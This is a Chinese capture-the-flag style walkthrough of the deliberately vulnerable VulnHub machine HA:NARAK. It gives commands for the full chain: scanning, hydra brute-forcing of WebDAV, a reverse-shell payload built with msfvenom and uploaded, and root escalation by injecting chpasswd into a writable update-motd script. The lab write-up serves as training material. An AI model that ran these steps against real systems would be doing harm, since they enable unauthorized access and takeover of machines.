VulnHub渗透测试实战靶场-HA:NARAK

VulnHub渗透测试实战靶场-HA:NARAK

  • 环境下载
  • HA:NARAK靶机搭建
  • 渗透测试
    • 信息搜集
    • 漏洞挖掘
    • getshell
    • 提权

环境下载

  • 戳此进行环境下载

HA:NARAK靶机搭建

  • 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可

渗透测试

信息搜集

  • 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l
  • 得到目标靶机的IP为:192.168.246.140
VulnHub渗透测试实战靶场-HA:NARAK_第1张图片
  • 使用 nmap 扫描开放的端口:sudo nmap -sU -Pn 192.168.246.140sudo nmap -sU -Pn 192.168.246.140,发现开放了 22、68、69、80 四个端口
VulnHub渗透测试实战靶场-HA:NARAK_第2张图片
  • 使用 dirb 扫描一下开放的 80 端口:dirb http://192.168.246.140
VulnHub渗透测试实战靶场-HA:NARAK_第3张图片

漏洞挖掘

  • 访问 192.168.246.140/webdav 发现需要用户名和密码进行登录,使用 cewl 生成 worldlist 后利用 hydra 进行爆破,得到一组用户名和密码:yamdoot:Swarg
cewl http://192.168.246.140 -w wordlist.txt

hydra -L wordlist.txt -P wordlist.txt -f -V 192.168.246.140 http-get /webdav
VulnHub渗透测试实战靶场-HA:NARAK_第4张图片

getshell

  • 搜索 webdav 相关漏洞利用方式后发现可以 cadaver 执行 put 命令来上传一个 shell
  • 使用 msfvenom 生成反弹 shell 的木马或者直接利用 Kali 自带的 webshell,将木马上传上去,访问该木马即可接收到反弹 shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.246.129 LPORT=1234 R > shell.php
VulnHub渗透测试实战靶场-HA:NARAK_第5张图片 VulnHub渗透测试实战靶场-HA:NARAK_第6张图片

提权

  • 翻阅信息,在 /mnt 下发现一个文件 hell.sh,查看该文件发现一串 Brainfuck 编码,解码后得到 chitragupt
VulnHub渗透测试实战靶场-HA:NARAK_第7张图片
  • 尝试利用 chitragupt 作为密码,利用 Home 目录下的用户进行登录
VulnHub渗透测试实战靶场-HA:NARAK_第8张图片
  • 用 python 起一个 http 服务,将 linpeas.sh 上传到目标靶机,并给 linpeas.sh 加上权限
VulnHub渗透测试实战靶场-HA:NARAK_第9张图片
  • 运行 linpeas.sh,发现 /etc/update-motd.d/ 目录下部分文件可写入
VulnHub渗透测试实战靶场-HA:NARAK_第10张图片
  • 修改 etc/update-motd.d/00-header 文件,将 root 的密码修改掉
echo "echo 'root:d1no' | sudo chpasswd" >> 00-header
VulnHub渗透测试实战靶场-HA:NARAK_第11张图片
  • 重新登录 ssh,使写入的内容执行,成功拿到 root 权限
VulnHub渗透测试实战靶场-HA:NARAK_第12张图片

你可能感兴趣的:(#,VulnHub,VulnHub,渗透测试,linux,安全)